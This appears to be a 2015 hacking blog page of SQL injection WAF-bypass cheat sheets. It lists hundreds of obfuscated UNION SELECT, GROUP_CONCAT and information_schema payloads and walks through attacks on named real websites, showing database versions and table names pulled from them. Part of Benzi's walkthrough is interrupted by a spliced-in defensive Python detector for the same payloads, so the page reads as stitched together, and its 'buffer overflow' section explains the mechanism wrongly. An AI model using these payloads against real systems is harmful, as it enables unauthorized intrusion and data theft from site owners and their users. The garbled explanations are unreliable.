Saturday, April 25, 2015

byPassing Cheat Sheet Of ALL WAF



Cheat Sheet Of UNION SELECT:::
This is the list of union select bypasses::
----------------------------------------------------------------------------------------------------------------
  1. +union+distinct+select+
  2. +union+distinctROW+select+
  3. /**//*!12345UNION SELECT*//**/
  4. /**//*!50000UNION SELECT*//**/
  5. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  6. +/*!u%6eion*/+/*!se%6cect*/+
  7. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  8. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  9. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  10. union /*!50000%53elect*/
  11. %55nion %53elect
  12. +--+Union+--+Select+--+
  13. +UnIoN/*&a=*/SeLeCT/*&a=*/
  14. id=1+?UnI?On?+'SeL?ECT?
  15. id=1+'UnI'||'on'+SeLeCT'
  16. UnIoN SeLeCt CoNcAt(version())--
  17. uNiOn aLl sElEcT
  18. uUNIONnion all sSELECTelect 
  19. /*union*/union/*select*/select+1,2,3/*
  20. /*uniXon*/union/*selXect*/select+1,2/*
  21. un/**/ion+sel/**/ect
  22. +#1q%0Aunion all#qa%0A#%0Aselect
  23. union /*!select*/+
  24. union/**/select/**/
  25. /**/union/**/select/**/
  26. /**/union/*!50000select*/
  27. /**//*!12345UNION SELECT*//**/
  28. /**//*!50000UNION SELECT*//**/
  29. /**/uniUNIONon/**/selSELECTect/**/
  30. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  31. /**//*!union*//**//*!select*//**/
  32. /**/UNunionION/**/SELselectECT/**/
  33. /**//*UnIOn*//**//*SEleCt*//**/
  34. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  35. /**/UNunionION/**/all/**/SELselectECT/**/
  36. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  37. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  38. uni
  39. %20union%20/*!select*/%20
  40. union%23aa%0Aselect
  41. union+distinct+select+
  42. union+distinctROW+select+
  43. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  44. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  45. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  46. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  47. /*!u%6eion*/+/*!se%6cect*/+
  48. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  49. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  50. union /*!50000%53elect*/
  51. +%2F**/+Union/*!select*/
  52. %55nion %53elect
  53. +?+Union+?+Select+?+
  54. +UnIoN/*&a=*/SeLeCT/*&a=*/
  55. uNiOn aLl sElEcT
  56. uUNIONnion all sSELECTelect
  57. union(select(1),2,3)
  58. union (select 1111,2222,3333)
  59. union (/*!/**/ SeleCT */ 11)
  60. %0A%09UNION%0CSELECT%10NULL%
  61. /*!union*//*?*//*!all*//*?*//*!select*/
  62. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  63. union+sel%0bect
  64. +uni*on+sel*ect+
  65. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  66. union(select (1),(2),(3),(4),(5))
  67. UNION(SELECT(column)FROM(table))
  68. id=1+?UnI?On?+?SeL?ECT?
  69. id=1+?UnI?||?on?+SeLeCT?
  70. union select 1?+%0A,2?+%0A,3?+%0A etc ?
  71. /*!00000Union*/ /*!00000Select*/
  72. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  73. %55nion %53elect
  74. %55nion(%53elect 1,2,3)-- -
  75. +union+distinct+select+
  76. +union+distinctROW+select+
  77. /**//*!12345UNION SELECT*//**/
  78. /**//*!50000UNION SELECT*//**/
  79. /**/UNION/**//*!50000SELECT*//**/
  80. /*!50000UniON SeLeCt*/
  81. union /*!50000%53elect*/
  82. + #?uNiOn + #?sEleCt
  83. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  84. /*!%55NiOn*/ /*!%53eLEct*/
  85. /*!u%6eion*/ /*!se%6cect*/
  86. +un/**/ion+se/**/lect
  87. uni%0bon+se%0blect
  88. %2f**%2funion%2f**%2fselect
  89. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  90. REVERSE(noinu)+REVERSE(tceles)
  91. /*--*/union/*--*/select/*--*/
  92. union (/*!/**/ SeleCT */ 1,2,3)
  93. /*!union*/+/*!select*/
  94. union+/*!select*/
  95. /**/union/**/select/**/
  96. /**/uNIon/**/sEleCt/**/
  97. +%2F**/+Union/*!select*/
  98. /**//*!union*//**//*!select*//**/
  99. /*!uNIOn*/ /*!SelECt*/
  100. +union+distinct+select+
  101. +union+distinctROW+select+
  102. uNiOn aLl sElEcT
  103. UNIunionON+SELselectECT
  104. /**/union/*!50000select*//**/
  105. 0%a0union%a0select%09
  106. %0Aunion%0Aselect%0A
  107. %55nion/**/%53elect
  108. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  109. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  110. %0A%09UNION%0CSELECT%10NULL%
  111. /*!union*//*--*//*!all*//*--*//*!select*/
  112. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  113. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  114. +UnIoN/*&a=*/SeLeCT/*&a=*/
  115. union+sel%0bect
  116. +uni*on+sel*ect+
  117. +#1q%0Aunion all#qa%0A#%0Aselect
  118. union(select (1),(2),(3),(4),(5))
  119. UNION(SELECT(column)FROM(table))
  120. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  121. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  122. union(select(1),2,3)
  123. union (select 1111,2222,3333)
  124. uNioN (/*!/**/ SeleCT */ 11)
  125. union (select 1111,2222,3333)
  126. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  127. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  128. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  129. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  130. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  131. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  132. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  133. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  134. /union\sselect/g
  135. /union\s+select/i
  136. /*!UnIoN*/SeLeCT
  137. +UnIoN/*&a=*/SeLeCT/*&a=*/
  138. +uni>on+sel>ect+
  139. +(UnIoN)+(SelECT)+
  140. +(UnI)(oN)+(SeL)(EcT)
  141. +?UnI?On?+'SeL?ECT?
  142. +uni on+sel ect+
  143. +/*!UnIoN*/+/*!SeLeCt*/+
  144. /*!u%6eion*/ /*!se%6cect*/
  145. uni%20union%20/*!select*/%20
  146. union%23aa%0Aselect
  147. /**/union/*!50000select*/
  148. /^.*union.*$/ /^.*select.*$/
  149. /*union*/union/*select*/select+
  150. /*uni X on*/union/*sel X ect*/
  151. +un/**/ion+sel/**/ect+
  152. +UnIOn%0d%0aSeleCt%0d%0a
  153. UNION/*&test=1*/SELECT/*&pwn=2*/
  154. un?+un/**/ion+se/**/lect+
  155. +UNunionION+SEselectLECT+
  156. +uni%0bon+se%0blect+
  157. %252f%252a*/union%252f%252a /select%252f%252a*/
  158. /%2A%2A/union/%2A%2A/select/%2A%2A/
  159. %2f**%2funion%2f**%2fselect%2f**%2f
  160. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  161. /*!UnIoN*/SeLecT+
-----------------------------------------------------------------------------------------------------------------------
Union Select bypass with URL Encoded Method:
-----------------------------------------------------------------------------------------------------------------------
  1. %55nion(%53elect)
  2. union%20distinct%20select
  3. union%20%64istinctRO%57%20select
  4. union%2053elect
  5. %23?%0auion%20?%23?%0aselect
  6. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  7. %55nion %53eLEct
  8. u%6eion se%6cect
  9. unio%6e %73elect
  10. unio%6e%20%64istinc%74%20%73elect
  11. uni%6fn distinct%52OW s%65lect
  12. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

---------------------------------------------------------------------------------------------------------------------
Cheat Sheet of Bypassing Order By and Group By
---------------------------------------------------------------------------------------------------------------------

  1. order by/**_**/
  2. /*!12345order*/ /*!12345by*/
  3. ) order by 1-- -
  4. ') order by 1-- -
  5. ')order by 1%23%23
  6. %')order by 1%23%23
  7. Null' order by 100--+
  8. Null' order by 9999--+
  9. ')group by 99-- -
  10. 'group by 119449-- -
  11. 'group/**/by/**/99%23%23
------------------------------------------------------------------------------------------------------------------------
Concat And Group_concat By Pass cheat Sheet ::
------------------------------------------------------------------------------------------------------------------------


  1. /*!12345group_concat*/(/*!12345table_name*/)
  2. /*!50000group_concat*/(/*!50000table_name*/)
  3. /*!GrOuP_ConCaT*/()
  4. /*!12345GroUP_ConCat*/()
  5. /*!50000gRouP_cOnCaT*/()
  6. /*!50000Gr%6fuP_c%6fnCAT*/()
  7. /*!group_concat*/()
  8. gRoUp_cOnCAt()
  9. group_concat(/*!*/)
  10. group_concat(/*!12345table_name*/)
  11. group_concat(/*!50000table_name*/)
  12. /*!group_concat*/(/*!12345table_name*/)
  13. /*!group_concat*/(/*!50000table_name*/)
  14. unhex(hex(group_concat(table_name)))
  15. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  16. unhex(hex(/*!12345group_concat*/(table_name)))
  17. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  18. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  19. unhex(hex(/*!50000group_concat*/(table_name)))
  20. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  21. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  22. CONVERT(group_concat(table_name)+USING+latin1)
  23. CONVERT(group_concat(table_name)+USING+latin2)
  24. CONVERT(group_concat(table_name)+USING+latin3)
  25. CONVERT(group_concat(table_name)+USING+latin4)
  26. CONVERT(group_concat(table_name)+USING+latin5)
  27. convert(group_concat(table_name)+using+ascii)
  28. convert(group_concat(/*!table_name*/)+using+ascii)
  29. convert(group_concat(/*!12345table_name*/)+using+ascii)
  30. convert(group_concat(/*!50000table_name*/)+using+ascii)
  31. /*!concat_ws(0x3a,)*/
  32. concat_ws(0x3a3a3a,version()
  33. CONCAT_WS(CHAR(32,58,32),version(),)
----------------------------------------------------------------------------------------------------------------
How to By Pass Tables:::
---------------------------------------------------------------------------------------------------------------
group_concat(/*!table_name*/)
  1. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -
  2. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()?
  3. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
===========================================================
How to By Pass Columns:::
===========================================================
  1. group_concat(/*!column_name*/)
  2. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  3. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -


========================================================================
URL enCoded By passing Table and columns::
===========================================================

(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
For example:
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?

========================================================================
illegal mix of Collations ByPass ::
========================================================================
bypass method

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

How To ByPass Precondition Failed In SQL injection



~~~~~~~~~~~~~With The Name Of ALLAH~~~~~~~~~~~~~~~~~~~~


Today we will learn how to bypass "Precondition Failed" in SQLi.

Steps::

Let's assume:

1- www.site.com/php?id=1 order by 4--
2- www.site.com/php?id=-1 union select 1,2,3 --
3- For example, 2 is the vulnerable column. Now we are going to perform DIOS:
4- www.site.com/php?id=-1 union select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3--

Now suppose it is showing us "Precondition Failed".


WAF byPass Method

----------------------------------------------------------------------------------------------------------------------
5- I have tested this error many times. When I encode the first character of "from" like %66rom, it works and gives me the result.

6- http://site.com/portfolio-detail.php?id=-11+ UNION SELECT 1,2,3,make_set(6,@:=0x0a,(/*!50000select*/(1) %66rom (/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),5,6,7,8,9


We have successfully bypassed this "Precondition Failed" WAF.

Precondition Failed bypass




------------------------------------------------------------------------------------------------------------------

AuthoR ::: MasOOD (Afghani)

Buffer overflows SQL Base injection



Today I am going to share with you how to bypass union select using the buffer overflow method.

What is a Buffer Overflow?
Buffer overflows can be triggered by inputs that are designed to execute code or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus they are the basis of many software vulnerabilities and can be maliciously exploited.
------------------------------------------------------------------------------------------------------------------------------

How to perform::
When we are trying to inject a site and at the union select stage we fail to bypass it, we use buffer overflow to bypass union select: we send so much data that it overflows the memory of the site.

When an overflow occurs it leaks some important data, but in the case of SQL injection it will show us the vulnerable columns.

------------------------------------------------------------------------------------------------------------------------------
Assume the memory capacity of the site is 100 characters. So we can perform an overflow by sending 100+ characters.
----------------------------------------------------------------------------------------------------------------------
www.site.com/php?id=1 union select 1,2,3--
union select by pass

WAF detects our injection.
Let's try to bypass it:
www.Site.com/php?id=1 /*!12345union*/ select 1,2,3

But this time our script is blocked by the hosting team :D


buffer over flow

------------------------------------------------------------------------------------------------------------------

BY Passing Union Select By Buffer OverFlows ::

www.site.com/php?id=1 union %23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A select 1,2,3--
This time we have successfully bypassed the union select.

-------------------------------------------------------------------------------------------------

Here we can use any characters, like ________, ++++++++++, BBBBBBBBB:

www.site.com/php?id=1 union %23+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%0A select 1,2,3--
-----------------------------------------------------------------------------------------------------------------------


Author :: Masood (Afghani)

How To ByPass Illegal Mix Of Collations

-------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------

Solving this problem as an SQL injector:

There are several ways you can bypass "illegal mix of collations for operation 'union'":

  1. using the CAST function
  2. using the CONVERT function
  3. using the HEX/UNHEX functions
  4. using the COMPRESS/UNCOMPRESS functions
  5. using the ENCODE/DECODE functions
  6. using AES encryption



Bypass illegal mix of collations with CAST function:

One can bypass this error using the CAST function.
cast() takes an expression of any type and returns a value of the given type.
Syntax of cast():
CAST(expression AS type)

http://website.com/page.php?id=1 union select 1,2,cast(@@version as binary)#


Bypass illegal mix of collations with AES_ENCRYPT() and AES_DECRYPT():

AES_ENCRYPT() and AES_DECRYPT() can also be used to bypass this error.
AES_ENCRYPT() implements encryption of a given string using the Advanced Encryption Standard (AES); these functions encrypt with a 128-bit key length by default. AES_ENCRYPT() uses the key with the given string to encrypt it, and AES_DECRYPT() decrypts that encrypted string with the same key (the one we set while encrypting) to return the original string.

Syntax of AES_ENCRYPT() and AES_DECRYPT():

AES_ENCRYPT(given_string, key)
AES_DECRYPT(encrypted_string, key)

Bypass example:

Suppose you are facing illegal mix of collations while fetching version() info.
Let's take the key as 1. Your syntax would be like:

http://website.com/page.php?id=1 union all select 1,2,AES_DECRYPT(AES_ENCRYPT(version(),1),1)#


Bypass illegal mix of collations with CONVERT function:

CONVERT() takes an expression/string in any character set and converts it into the specified character set.

Syntax of CONVERT():
CONVERT(given_string USING required_char_set)
Example:

http://website.com/page.php?id=1 union all select 1,2,convert(@@version using ascii)#

Bypass illegal mix of collations using ENCODE() and DECODE():

ENCODE() is also an encryption function of MySQL. It works like AES_ENCRYPT(), taking a string and encoding it with a provided key.
Similarly, DECODE() will decode that encoded string using the key we provided while encoding.

Syntax of ENCODE() and DECODE():
ENCODE('string', key)
DECODE('encoded string', key)

Real time example:

http://website.com/page.php?id=1 union all select 1,2,decode(encode(@@version,1),1)#

Bypass illegal mix of collations with COMPRESS() and UNCOMPRESS() functions:

COMPRESS() compresses a string and returns the result as a binary string,
and that compressed string can be uncompressed later by the UNCOMPRESS() function.

Syntax of COMPRESS() and UNCOMPRESS():
compress('given_string')
uncompress('compressed string')

Real time example:

http://website.com/page.php?id=1 union all select 1,2,uncompress(compress(@@version))#

Bypass illegal mix of collations using HEX() and UNHEX() functions:

HEX() takes a string and returns the hexadecimal representation of that string, with each character converted into two hexadecimal digits; UNHEX() reverses that hexadecimal string back to the original string.
Syntax of HEX() and UNHEX():
HEX('given string')
UNHEX('hexadecimal_of_string')

Real time example:

http://website.com/page.php?id=1 union all select 1,2,unhex(hex(@@version))#

Auth0R ::: Ahsan Shabbir (God SQLI) 

Wednesday, April 22, 2015

NEW Tips and Tricks OF WAF bypass


WAF by Pass tricks

New WAF Bypass Method


=======================================================================
                                                      WAF Bypass By Benzi
=======================================================================
Sup.

In recent days I get a lot of WAF bypass requests where the regular methods (/* , #\n , URL encoding etc.) don't work.
So today I will write about some new methods to handle these kinds of sites, and some other new stuff.
This time there will be no pics in this paper, only text.

TOC:

  • WAF bypass (\N , e , {})
  • DIOS in non-geometric error based
  • ABIOS 

WAF BYPASS: 

Up to now, if we saw an error like "403 forbidden", we didn't take it very seriously.
We just used one of the known bypass methods and owned the website.
But recently the WAFs are getting smarter and harder. But so do I.

We will use this site for demonstration.


Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=78
=======================================================================
I counted the columns using group by, and there are 16. So our query looks like this.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=-16 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
=======================================================================
" Not Acceptable! This error was generated by Mod_Security "
Seems like mod_security is on. How can we bypass Mod_Security? Usually /*!50000union*/ and distinct do the trick.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=-16 /*!50000union*/ distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -
=======================================================================
No more Mod_Security, but now we got another WAF. That's the first trick I wanna show you today. As we can see, 'union' is being blocked. But how strongly? Let's do some tests.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16 union
=======================================================================
403, union gets blocked. So maybe the 'e' trick will do?

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16e0union
=======================================================================
403, still blocked.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=16aunion
=======================================================================
No 403, union is not blocked. But how can we stick a letter to union and not get a 1064?
We can do that by using \N. It is case sensitive and stands for NULL. Let's try

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
=======================================================================
Bypassed, column #10 on the screen. Let's try to get the version.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16--
=======================================================================
403 again. Seems like we can't directly put version() in the column. That's the second trick I wanna show you. Usually we would do something like (version()), but it seems that's also covered here. In MySQL there's something called "timestamp". Basically, it defines the type of the string, like
Code:
SELECT TIMESTAMP 'str';
The cool thing about it is that we can write it like this
Code:
SELECT { ts column};
so we can use that to bypass WAFs, like this

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,{f version()},11,12,13,14,15,16--
=======================================================================
Boom, 5.5.40-36.1. Another thing I want to talk about today is getting tables. So let's try to get tables.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from--
=======================================================================
403, WAF blocks from. Let's try to stick a number to it.

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16from--
=======================================================================
No WAF. Usually, to stick a number to "from", we use 'e'. It's forbidden here, but there's another method: we can simply put a dot before the number and write anything after it without a space. It's like 0.16. So in our injection

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from sometable--
=======================================================================
No WAF. Now when we write "from information_schema.tables", we get the modsecurity error. Remember the timestamp thing? We can also do that with tables, so

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from {f information_schema.tables}--
=======================================================================
modsecurity - bypassed. 403 - not yet. As we can see, the combination of "schema.tables" is blocked. The usual ``, +, () are not working, so we gotta think outside the box. We can mess with the query parser using 'e' again. When the webserver parses the query, it uses the db.table.column format. In SQL, information_schema 9.e.tables = information_schema.tables. So

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,.16from {f information_schema 0.e.tables}--
=======================================================================
Now for the table_name part. As before, we can't just write the column instead of column #10, so we gotta be creative. Just like the information_schema bypass, we can also use 'e' to mess with the parser on the columns. In columns it goes like this: ``0.e.table_name = table_name, so

Code:
=======================================================================
http://blue-planet.gr/gallery_zoom.php?Img_Cat_ID=\Nunion distinct select 1,2,3,4,5,6,7,8,9,``0.e.table_name,11,12,13,14,15,.16from {f information_schema 0.e.tables}--
=======================================================================
Bypassed.
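As an added defender-side example that is not from the cheat sheet at the top of the page nor from Benzi's write-up, the following Python normalizes a request parameter the way MySQL would tokenize it (URL decoding, `/*!...*/` versus `/*...*/` comments, `#`/`--` comments, `\N`, the `{f ...}` escape, numbers glued to keywords) and only then matches UNION ... SELECT; the sample payloads are copied from the cheat-sheet lists and the walkthrough above, and the two benign strings are constructed. The regex names are mine, and the `uniUNIONon` entry is included to show that a filter which deletes keywords once and forwards the rest is what makes that class of entries work.

```python
import re
from urllib.parse import unquote_plus

# Constructed samples: the first group is copied from the UNION SELECT cheat sheet at
# the top of the page, the next two from the \N / {f ...} walkthrough above; the last
# two are benign strings that a detector must NOT flag.
SAMPLES = [
    ("+union+distinct+select+", True),
    ("/**//*!12345UNION SELECT*//**/", True),
    ("+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+", True),
    ("+/*!u%6eion*/+/*!se%6cect*/+", True),
    ("%55nion %53elect", True),
    ("+#1q%0Aunion all#qa%0A#%0Aselect", True),
    ("union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C", True),
    ("union(select(1),2,3)", True),
    ("%0A%09UNION%0CSELECT%10NULL%", True),
    (r"\Nunion distinct select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--", True),
    (r"\Nunion distinct select 1,2,3,4,5,6,7,8,9,{f version()},11,12,13,14,15,"
     r".16from {f information_schema 0.e.tables}--", True),
    ("credit union selected", False),
    ("16", False),
]

# Deliberately generous: MySQL wants exactly five digits after /*!, a detector accepts 0-5.
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)  # /*!50000 x */: MySQL runs x
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)              # /* x */: MySQL ignores x
LINE_COMMENT = re.compile(r"(?:#|--)[^\n]*")                # '#' or '--' to end of line
ODBC_ESCAPE = re.compile(r"\{\s*[a-z]+\s+|\}", re.I)         # {f expr} is accepted as expr
NULL_LITERAL = re.compile(r"\\N")                            # \N is NULL, even glued to a word
NUMBER_GLUE = re.compile(r"(\.\d+|\d+e\d+)(?=[a-z])", re.I)  # .16from -> .16 from
WHITESPACE = re.compile(r"[\s\x0b\x0c\xa0]+")                # tab, VT, FF, NBSP, newlines
UNION_SELECT = re.compile(
    r"\bunion\b(?:\s+(?:all|distinct|distinctrow))?\s*\(?\s*select\b")


def normalize(param: str) -> str:
    """Reduce a query-string parameter to the SQL text MySQL would actually tokenize."""
    s = param
    for _ in range(3):                   # decode until stable so %2555nion collapses too
        decoded = unquote_plus(s)        # also turns form-encoded '+' into spaces
        if decoded == s:
            break
        s = decoded
    s = NULL_LITERAL.sub(" null ", s)    # before lower(): \N is case sensitive in MySQL
    s = ODBC_ESCAPE.sub(" ", s)
    s = VERSION_COMMENT.sub(r" \1 ", s)  # keep the body, it executes on MySQL
    s = PLAIN_COMMENT.sub(" ", s)        # drop the body, it never executes
    s = LINE_COMMENT.sub(" ", s)
    s = NUMBER_GLUE.sub(r"\1 ", s)
    s = WHITESPACE.sub(" ", s)
    return s.strip().lower()


def is_union_select(param: str) -> bool:
    """Match on the normalized text, never on the raw parameter."""
    return UNION_SELECT.search(normalize(param)) is not None


def mismatches() -> list:
    """Sample payloads whose verdict differs from the expected one (should be empty)."""
    return [p for p, expected in SAMPLES if is_union_select(p) != expected]


# The cheat sheet's 'uniUNIONon' entries only work against a filter that deletes
# keywords once and forwards the rest; a WAF should block and log, never rewrite.
KEYWORD_SPLICE = "/**/uniUNIONon/**/aALLll/**/selSELECTect/**/"


def naive_keyword_strip(param: str) -> str:
    """The flawed sanitizer those entries target: a single pass of keyword deletion."""
    return re.sub(r"union|select|all", "", param, flags=re.I)
```

Run `mismatches()` to confirm every sample gets the expected verdict; compare `is_union_select(KEYWORD_SPLICE)` with `is_union_select(naive_keyword_strip(KEYWORD_SPLICE))` to see the stripping filter manufacture the attack.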
DIOS in non-geometric error based

Something I also saw recently is people trying to make DIOS in polygon. The problem with doing that is that, unlike union, polygon is limited by the result, so we gotta "be cheap" to save space. Even though the result is limited, it's still larger than other error based outputs. The original DIOS query is this.

Code:

(select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x0a,table_name))))x)

p.s. I remember when denjacker showed me that 3 years ago, I was absolutely amazed to see how far people can get only by using a simple variable. Let's go back to the tut. We will use this site to demonstrate.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=1
=======================================================================
Let's check if we can use polygon.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)k)p))
=======================================================================
{ Qusers -  Error #1367: Illegal non geometric '(select `p`.`@@version` from (select '5.1.73-log' AS `@@version` from (select @@version AS `@@version`) `k`) `p`)' value found during parsing }

Yes, we can. But as we can see, the output is very large; our DIOS will never fit in. The red part is the alias, which takes a lot of space. Let's try to save space by giving @@version a shorter alias, like 'a'.


Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version a)k)p))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `p`.`a` from (select '5.1.73-log' AS `a` from (select a AS `a`) `k`) `p`)' value found during parsing }
Shorter indeed. But can we reduce more? Let's try giving @@version an empty alias.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version``)k)p))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `` from (select '5.1.73-log' AS `` from (select AS ``) `k`) `p`)' value found during parsing }

That's more like it. Now let's try to put the DIOS syntax in our query.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from((select (@) from (select(@:=0x00),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x0a,table_name))))x))k)p))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `p`.`(@)` from (select '' value found during parsing }

